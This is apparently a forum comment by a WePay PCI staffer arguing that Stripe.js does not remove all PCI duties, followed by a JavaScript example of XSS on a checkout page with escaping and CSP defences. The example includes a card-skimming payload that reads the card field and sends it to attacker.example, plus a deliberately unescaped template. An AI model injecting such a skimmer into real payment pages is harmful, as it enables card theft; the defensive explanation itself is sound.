by lsh123
5314 days ago
Disclaimer: I work for WePay and I am directly responsible for WePay's PCI audit process. I am sure everyone would agree that the PCI spec is complex and not easy to understand :) That said, its intention is pretty clear: protect credit card information from leaking to "bad" guys. A great deal of the PCI spec is about protecting the stored credit card data. You are absolutely correct that Stripe's JS solution allows one to avoid dealing with these issues. However, many other sections of the PCI spec discuss other potential vectors of attack. For example, if you don't follow secure coding guidelines then an attacker can embed malicious JS on your website (through XSS or other attacks) and steal credit card information. Obviously, the suggestion to serve your pages over SSL doesn't help you avoid these problems. I think Stripe's model is great. But I don't believe that it allows one to completely avoid PCI compliance. I believe that you correctly phrased it on Stripe's home page: "Stripe.js lets you build your own payment forms while still avoiding most PCI requirements."
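The attack vector lsh123 describes, as an added example that is not code from this thread, from Stripe, or from WePay: the card number is typed into a page the merchant serves, so any script injected into that page can read the field before Stripe.js ever tokenizes it. The checkout template, the reflected `returnTo` parameter, the exfiltration host and the exact CSP policy are assumptions made for the example; only `js.stripe.com` as Stripe's script origin is taken from Stripe's own documentation.

```javascript
// Added example (not from the thread or from Stripe/WePay). Shows why an XSS
// on the card-entry page defeats "card data never touches our server", and
// two mitigations: output escaping and a Content-Security-Policy.

// Vulnerable pattern: a query parameter (assumed name: returnTo) is reflected
// into the checkout page without escaping.
function renderCheckoutUnsafe(returnTo) {
  return (
    '<form id="payment"><input id="card-number" autocomplete="cc-number"></form>' +
    '<a href="' + returnTo + '">Back to cart</a>'
  );
}

// Escape the five characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened: the same template with the parameter escaped before insertion.
function renderCheckoutSafe(returnTo) {
  return (
    '<form id="payment"><input id="card-number" autocomplete="cc-number"></form>' +
    '<a href="' + escapeHtml(returnTo) + '">Back to cart</a>'
  );
}

// Constructed payload: closes the href attribute, injects a script that reads
// the card field as it is filled in, then re-opens an attribute so the rest
// of the template still parses. The attacker host is made up.
const PAYLOAD =
  '"><script>document.getElementById("card-number")' +
  '.addEventListener("change",e=>fetch("https://attacker.example/?c="+' +
  'encodeURIComponent(e.target.value)))</script><a href="';

// Does the rendered document contain a live <script> element?
function containsScript(html) {
  return /<script[\s>]/i.test(html);
}

// Defence in depth: a CSP for the checkout page that loads Stripe.js from
// js.stripe.com (Stripe's documented script origin) but forbids inline
// script, so an injected <script> block is not executed even if escaping
// fails somewhere. The remaining directives are an assumption.
const CHECKOUT_CSP =
  "default-src 'self'; script-src 'self' https://js.stripe.com; " +
  "frame-src https://js.stripe.com; connect-src 'self' https://api.stripe.com; " +
  "object-src 'none'; base-uri 'none'";

// Simplified check (ignores nonces, hashes and 'strict-dynamic'): an injected
// inline script with no nonce runs only if the governing directive
// (script-src, or default-src when script-src is absent) lists 'unsafe-inline'.
function cspAllowsInlineScript(csp) {
  const directives = Object.fromEntries(
    csp.split(';')
      .map((d) => d.trim())
      .filter(Boolean)
      .map((d) => {
        const [name, ...sources] = d.split(/\s+/);
        return [name, sources];
      })
  );
  const sources = directives['script-src'] || directives['default-src'] || [];
  return sources.includes("'unsafe-inline'");
}

// Usage: compare the two renderings of the same payload.
console.log('unsafe page has script:', containsScript(renderCheckoutUnsafe(PAYLOAD)));
console.log('safe page has script:  ', containsScript(renderCheckoutSafe(PAYLOAD)));
console.log('CSP allows inline:     ', cspAllowsInlineScript(CHECKOUT_CSP));
```

The point is the one the comment makes: Stripe.js removes card data from your servers, but not from your pages, so the PCI requirements about secure coding and about what runs on the payment page still apply to you.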
So basically: Be smart about what goes on your sensitive, mission-critical payment-receiving pages, as you should be. It's not extremely difficult. A little bit more responsibility in return for more flexibility.